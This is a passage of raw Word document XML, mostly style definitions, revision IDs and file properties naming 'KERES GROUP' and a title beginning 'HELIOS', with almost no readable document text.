              <w:t>2</w:t>
            </w:r>
          </w:fldSimple>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC59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F20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4C8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412D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE2E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303C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B760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95F22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A662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770B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="777C7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8CC325D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A494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F762A5"/>
    <w:rsid w:val="00023738"/>
    <w:rsid w:val="0002399E"/>
    <w:rsid w:val="00081149"/>
    <w:rsid w:val="000A495B"/>
    <w:rsid w:val="000A70A1"/>
    <w:rsid w:val="001925E6"/>
    <w:rsid w:val="00194349"/>
    <w:rsid w:val="001D55BA"/>
    <w:rsid w:val="001E73AA"/>
    <w:rsid w:val="001E7BF4"/>
    <w:rsid w:val="001F6485"/>
    <w:rsid w:val="00222028"/>
    <w:rsid w:val="00230C15"/>
    <w:rsid w:val="00286BEB"/>
    <w:rsid w:val="002C468B"/>
    <w:rsid w:val="002C4F88"/>
    <w:rsid w:val="002D7E4F"/>
    <w:rsid w:val="002E291E"/>
    <w:rsid w:val="002F4309"/>
    <w:rsid w:val="0030686A"/>
    <w:rsid w:val="003857E8"/>
    <w:rsid w:val="00390A19"/>
    <w:rsid w:val="003B0711"/>
    <w:rsid w:val="003F649D"/>
    <w:rsid w:val="00400137"/>
    <w:rsid w:val="004253B2"/>
    <w:rsid w:val="00464B5B"/>
    <w:rsid w:val="004825E7"/>
    <w:rsid w:val="004E7BB4"/>
    <w:rsid w:val="00536E6B"/>
    <w:rsid w:val="005405D3"/>
    <w:rsid w:val="00551FAB"/>
    <w:rsid w:val="005E6EE8"/>
    <w:rsid w:val="00601F49"/>
    <w:rsid w:val="00634C3D"/>
    <w:rsid w:val="00650278"/>
    <w:rsid w:val="0065380F"/>
    <w:rsid w:val="0069698E"/>
    <w:rsid w:val="006F0736"/>
    <w:rsid w:val="007020F3"/>
    <w:rsid w:val="007115ED"/>
    <w:rsid w:val="00777DCC"/>
    <w:rsid w:val="00794F69"/>
    <w:rsid w:val="007D386D"/>
    <w:rsid w:val="007D6E9D"/>
    <w:rsid w:val="007E64B7"/>
    <w:rsid w:val="008F6068"/>
    <w:rsid w:val="00917D01"/>
    <w:rsid w:val="00926E90"/>
    <w:rsid w:val="00937976"/>
    <w:rsid w:val="009502A2"/>
    <w:rsid w:val="00957528"/>
    <w:rsid w:val="00961D7D"/>
    <w:rsid w:val="009C7420"/>
    <w:rsid w:val="00A114B0"/>
    <w:rsid w:val="00A13B0E"/>
    <w:rsid w:val="00A320AF"/>
    <w:rsid w:val="00A3458C"/>
    <w:rsid w:val="00A46F32"/>
    <w:rsid w:val="00A9773A"/>
    <w:rsid w:val="00B060B1"/>
    <w:rsid w:val="00BB5A17"/>
    <w:rsid w:val="00BF42B9"/>
    <w:rsid w:val="00CC038F"/>
    <w:rsid w:val="00CC1DF7"/>
    <w:rsid w:val="00CC5922"/>
    <w:rsid w:val="00D10F0B"/>
    <w:rsid w:val="00D26817"/>
    <w:rsid w:val="00D30361"/>
    <w:rsid w:val="00D5113F"/>
    <w:rsid w:val="00DB4F37"/>
    <w:rsid w:val="00DC434E"/>
    <w:rsid w:val="00DF779C"/>
    <w:rsid w:val="00E2570F"/>
    <w:rsid w:val="00F2602D"/>
    <w:rsid w:val="00F32926"/>
    <w:rsid w:val="00F762A5"/>
    <w:rsid w:val="00F85883"/>
    <w:rsid w:val="00FF2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80F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0065380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5380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5380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5380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5380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5380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5380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5380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5380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80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5380F"/>
    <w:rPr>
      <w:smallCaps/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F76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2A5"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F762A5"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F762A5"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:smallCaps/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00536E6B"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00957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5380F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="5"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0065380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5380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5380F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:smallCaps/>
      <w:spacing w:val="10"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:smallCaps/>
      <w:spacing w:val="10"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="0065380F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="0065380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5380F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:smallCaps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="0065380F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00653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0F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006538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38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C24565-08AF-4238-9922-EDA334FF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21</Pages>
  <Words>5260</Words>
  <Characters>29985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HELIOS </vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>KERES GROUP</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>35175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dc:title>
  <dc:subject>KERES GROUP</dc:subject>
  <dc:creator>mos/x41</dc:creator>
  <cp:lastModifiedBy>x90</cp:lastModifiedBy>
  <cp:revision>49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-01-28T20:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-01-31T16:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>